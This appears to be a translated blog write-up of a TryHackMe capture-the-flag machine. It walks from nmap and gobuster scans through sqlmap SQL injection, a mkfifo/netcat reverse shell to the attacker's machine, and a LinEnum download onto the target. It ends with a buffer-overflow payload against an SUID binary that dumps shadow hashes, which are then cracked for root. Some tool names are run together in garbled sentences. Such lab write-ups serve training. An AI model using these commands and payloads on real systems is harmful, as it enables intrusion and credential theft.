Youtube walkthrough:-
Investigating hosts
First, we'll explore the ports that are open in nmap by getting the IP address byDeploy. You can do a detailed investigation by applying the option, but it takes time, so you will first remove it and investigate the open port first.-A
$ sudo nmap 10.10.194.163 -p1-1000 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 20:49 JST
Nmap scan report for 10.10.194.163
Host is up (0.31s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 403.50 seconds
Web page research
Since there is a web server, I will try to do a content scan to investigate what kind of pages there are. Use to do this.
In addition, the dictionary list is good for your choice, but personally, the first time is included in Kali, but versatility is also high, and the number of scans is not too large, so it is recommended.gobuster/usr/share/wordlists/dirb/common.txt
$ gobuster dir -x html,txt,php -u http://10.10.194.163 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.194.163
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
2020/05/19 21:05:04 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
.............................................
/administrator.php (Status: 200)
.............................................
===============================================================
2020/05/19 21:13:15 Finished
===============================================================
adiministrator.phpI found a login form when I try to connect.
Let's suspect that password cracking and SQL injection cannot be used in the login form. Password cracking can be time-consuming in some cases, and there are no situations where user information can be obtained this time. So we will investigate whether we can try SQL injection.
It seems that it is not possible to use it in the examination of OSCP, but this time I use it with an emphasis on simplicity.sqlmap
$ sqlmap -u http://10.10.194.163/administrator.php --dump --forms --level=5 --risk=3
___
__H__
___ ___[(]_____ ___ ___ {1.4.4#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:25:14 /2020-05-19/
[21:25:15] [INFO] testing connection to the target URL
[21:25:15] [INFO] searching for forms
[#1] form:
POST http://10.10.194.163/administrator.php
POST data: username=&password=
do you want to test this form? [Y/n/q]
>
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
...............................................
Database: users
Table: users
[1 entry]
+----------+------------+
| username | password |
+----------+------------+
| ******** | ********** |
+----------+------------+
[21:44:45] [INFO] table 'users.users' dumped to CSV file '/xxxx/yyyyyy/.sqlmap/output/10.10.194.163/dump/users/users.csv'
[21:44:45] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/xxxx/yyyyyy/.sqlmap/output/results-05192020_0925pm.csv'
[*] ending @ 21:44:45 /2020-05-19/
If you log in with this result, you will see a screen to hit the command.
Please check the display result appropriately or by using the command. This is an easy page for command injection.
Therefore, we aim to use this command injection to invade with a reverse shell.
First, launch the listening port on the attacking terminal.idlsnetcat
kali:~$ nc -lvp 4444
Next, there are various
ways to realize the reverse shell on the command injection screen. is the simplest command, but it often does not support this option for security purposes.
This time, we realized the reverse shell by the following technique using.netcat-e /bin/shmkfifo
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc (KaliのIPaddress) 4444 >/tmp/f
This command will remove the shell.
kali:~$ netcat -lvp 4444
listening on [any] 4444 ...
10.10.194.163: inverse host lookup failed: Unknown host
connect to [10.9.5.213] from (UNKNOWN) [10.10.194.163] 53026
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
Information gathering (intrusion)
Try to find out if there are any useful files.
For example, you can search for directories, commands, commands, etc. by using commands, commands, commands, etc., but this time, because the location where the password was placed from the directory where you logged in was near, we immediately found a folder with a suspicious name that seems to be hidden.
Please try your best to find it./home/var/opttreefindls
If you open the file, you will find your password inside. Let's remember where the password could be used here, as seen in the first run.
With the following command, you can keep a firm grasp of what kind of users are there, connect them, and break in.nmapsshssh
$ cat /etc/passwd | grep -v "nologin" | grep -v "false" | grep -v "sync"
root:x:0:0:root:/root:/bin/bash
papa:x:1000:1000:qaa:/home/papa:/bin/bash
pingu:x:1002:1002::/home/pingu:/bin/bash
kali:~$ ssh pingu@10.10.194.163
The authenticity of host '10.10.194.163 (10.10.194.163)' can't be established.
ECDSA key fingerprint is SHA256:jAGdoIBGaTVGRC6n/NXl76tRfHyed/hhboT1IvCPO84.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.194.163' (ECDSA) to the list of known hosts.
pingu@10.10.194.163's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Mon Jan 20 14:14:47 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
pingu@ubuntu:~$ id
uid=1002(pingu) gid=1002(pingu) groups=1002(pingu),4(adm),24(cdrom),27(sudo),30(dip)
pingu@ubuntu:~$ whoami
pingu
pingu@ubuntu:~$ sudo -l
[sudo] password for pingu:
Sorry, user pingu may not run sudo on ubuntu.
Information gathering (elevation of privilege)
The next thing to do is to promote privileges, but I tried to check the privileges with the command, but I gave up because I didn't seem to have any permissions.
Next, we will use the information gathering tool. I'll use what I introduced in the previous blog, but let's do it in this time.
The flow is as follows.
- Download the tool to
Kali side - Launch SimpleHTTP
server on Kali side - wget from Kali on the invading
machine side - Runsudo -lsudolinpeas.shLinEnumLinEnum
kali:~$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
kali:~$ python -m SimpleHTTPServer 9999
pingu@ubuntu:~$ wget http://(KaliのIPaddress):9999/LinEnum.sh
The output of these tools is thought to be good if you first look at the binaries allocated to root.
Then, the binary which seemed to be interesting was found.SUID
..................
-e \e[00;31m[-] SUID files:\e[00m
-r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root
..................
This command does not happen at first glance even if you run it and hit the command, but it seems to be usable.
Exploit
If you are looking for additional information to see if you can do something, step on that you have confirmed that it is in the pingu user's home directory, and try to exploit it over the debugger..gdbinitgdb/opt/secret/root
pingu@ubuntu:~$ gdb -q /opt/secret/root
pwndbg: loaded 178 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from /opt/secret/root...(no debugging symbols found)...done.
pwndbg> i func
All defined functions:
Non-debugging symbols:
0x08048330 _init
0x08048370 setgid@plt
0x08048380 system@plt
0x08048390 __libc_start_main@plt
0x080483a0 setuid@plt
0x080483b0 __isoc99_scanf@plt
0x080483d0 _start
0x08048400 __x86.get_pc_thunk.bx
0x08048410 deregister_tm_clones
0x08048440 register_tm_clones
0x08048480 __do_global_dtors_aux
0x080484a0 frame_dummy
0x080484cb shell
0x08048504 get_input
0x08048521 main
0x08048550 __libc_csu_init
0x080485b0 __libc_csu_fini
0x080485b4 _fini First, I got the function list. It looks ridiculous. I will lightly disassemble the area around.shellmainshellget_input
pwndbg> disassemble main
Dump of assembler code for function main:
0x08048521 <+0>: lea ecx,[esp+0x4]
0x08048525 <+4>: and esp,0xfffffff0
0x08048528 <+7>: push DWORD PTR [ecx-0x4]
0x0804852b <+10>: push ebp
0x0804852c <+11>: mov ebp,esp
0x0804852e <+13>: push ecx
0x0804852f <+14>: sub esp,0x4
0x08048532 <+17>: call 0x8048504 <get_input>
0x08048537 <+22>: mov eax,0x0
0x0804853c <+27>: add esp,0x4
0x0804853f <+30>: pop ecx
0x08048540 <+31>: pop ebp
0x08048541 <+32>: lea esp,[ecx-0x4]
0x08048544 <+35>: ret
End of assembler dump.
pwndbg> disassemble get_input
Dump of assembler code for function get_input:
0x08048504 <+0>: push ebp
0x08048505 <+1>: mov ebp,esp
0x08048507 <+3>: sub esp,0x28
0x0804850a <+6>: sub esp,0x8
0x0804850d <+9>: lea eax,[ebp-0x28]
0x08048510 <+12>: push eax
0x08048511 <+13>: push 0x80485ec
0x08048516 <+18>: call 0x80483b0 <__isoc99_scanf@plt>
0x0804851b <+23>: add esp,0x10
0x0804851e <+26>: nop
0x0804851f <+27>: leave
0x08048520 <+28>: ret
End of assembler dump.
pwndbg> disassemble shell
Dump of assembler code for function shell:
0x080484cb <+0>: push ebp
0x080484cc <+1>: mov ebp,esp
0x080484ce <+3>: sub esp,0x8
0x080484d1 <+6>: sub esp,0xc
0x080484d4 <+9>: push 0x3e8
0x080484d9 <+14>: call 0x80483a0 <setuid@plt>
0x080484de <+19>: add esp,0x10
0x080484e1 <+22>: sub esp,0xc
0x080484e4 <+25>: push 0x3e8
0x080484e9 <+30>: call 0x8048370 <setgid@plt>
0x080484ee <+35>: add esp,0x10
0x080484f1 <+38>: sub esp,0xc
0x080484f4 <+41>: push 0x80485d0
0x080484f9 <+46>: call 0x8048380 <system@plt>
0x080484fe <+51>: add esp,0x10
0x08048501 <+54>: nop
0x08048502 <+55>: leave
0x08048503 <+56>: ret
End of assembler dump.
From the perspective of each, it seems that is called in the main function and receives the input. You can also see that the shell function is called because the function is called. Since it is out of the sequence of flows that occurs in the main function, perhaps the idea is to use a technique such as buffer overflow to transfer control to the shell function, or start the shell using the function. Something stored in the address as an argument is stacked on the stack and passed to the function inside the shell function, so the contents are displayed.get_inputsystemsystemsystem0x80485d0push
pwndbg> x/s 0x80485d0
0x80485d0: "cat /var/backups/shadow.bak"
/etc/shadowIt looks like a backup file of. Is a file that stores password hashes, so if you can see this, you may be able to parse the password of papa and root. So let's transfer control to the function. To cause a buffer overflow in the /etc/shadow shell, you first need to find the offset that the program will use as input before causing a segmentation fault. The details of the buffer overflow principle are omitted here. How to calculate the offset ① In pwndbg, the offset can be calculated using the cyclic command.
pwndbg> r < <(cyclic 50)
Starting program: /opt/secret/root < <(cyclic 50)
Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────
EAX 0x1
EBX 0x0
ECX 0x1
EDX 0xf771c87c (_IO_stdfile_0_lock) ◂— 0
EDI 0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
ESI 0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
EBP 0x6161616b ('kaaa')
ESP 0xff9ed260 ◂— 0xf700616d /* 'ma' */
EIP 0x6161616c ('laaa')
───────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────
Invalid address 0x6161616c
───────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xff9ed260 ◂— 0xf700616d /* 'ma' */
01:0004│ 0xff9ed264 —▸ 0xff9ed280 ◂— 0x1
02:0008│ 0xff9ed268 ◂— 0x0
03:000c│ 0xff9ed26c —▸ 0xf7581637 (__libc_start_main+247) ◂— add esp, 0x10
04:0010│ 0xff9ed270 —▸ 0xf771b000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
... ↓
06:0018│ 0xff9ed278 ◂— 0x0
07:001c│ 0xff9ed27c —▸ 0xf7581637 (__libc_start_main+247) ◂— add esp, 0x10
─────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────
► f 0 6161616c
f 1 f700616d
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Program received signal SIGSEGV (fault address 0x6161616c)
pwndbg> cyclic -l 0x6161616c
44
How to find offsets (2)
The method of (1) was in the induction of TryHackMe, but I did it by the following method because I was absorbed in solving it at this time and did not see the induction. If there is pwndbg, it is more convenient on top.
kali:~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A (←コピペ)
ingu@ubuntu:~$ gdb /opt/secret/root -q
pwndbg: loaded 178 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from /opt/secret/root...(no debugging symbols found)...done.
pwndbg> run
Starting program: /opt/secret/root
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Program received signal SIGSEGV, Segmentation fault.
0x35624134 in ?? ()
kali:~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x35624134
[*] Exact match at offset 44
Either way is fine, but now you know that the offset is.
Let's use this offset to pour control into the shell function.
Since the address of the shell function is more than the result of the function address list, consider that it is a little-endian, enter a command similar to the following:440x080484cb
pingu@ubuntu:~$ python -c 'print("A"*44+"\xcb\x84\x04\x08")' | /opt/secret/root
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
Illegal instruction
Now you can get the hash.
Hash parsing
Create a file that writes a root hash.$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.
$ echo "$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck." > hash
I was introduced to the induction, but I used John The Ripper.hashcat
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
******* (?)
1g 0:00:03:32 DONE (2020-05-20 19:29) 0.004697g/s 1126p/s 1126c/s 1126C/s lovelife07..lossims
Use the "--show" option to display all of the cracked passwords reliably
Session completed
A certain password appears in .
Now that I know the password, I was able to get root authority.******
pingu@ubuntu:~$ su
Password:
root@ubuntu:/home/pingu# id
uid=0(root) gid=0(root) groups=0(root)
At the end
That's all there is to it.
It was a very fun machine to do personally because it required a certain understanding from the web to the assembly.
I hope you will try it out.
Comments
Post a Comment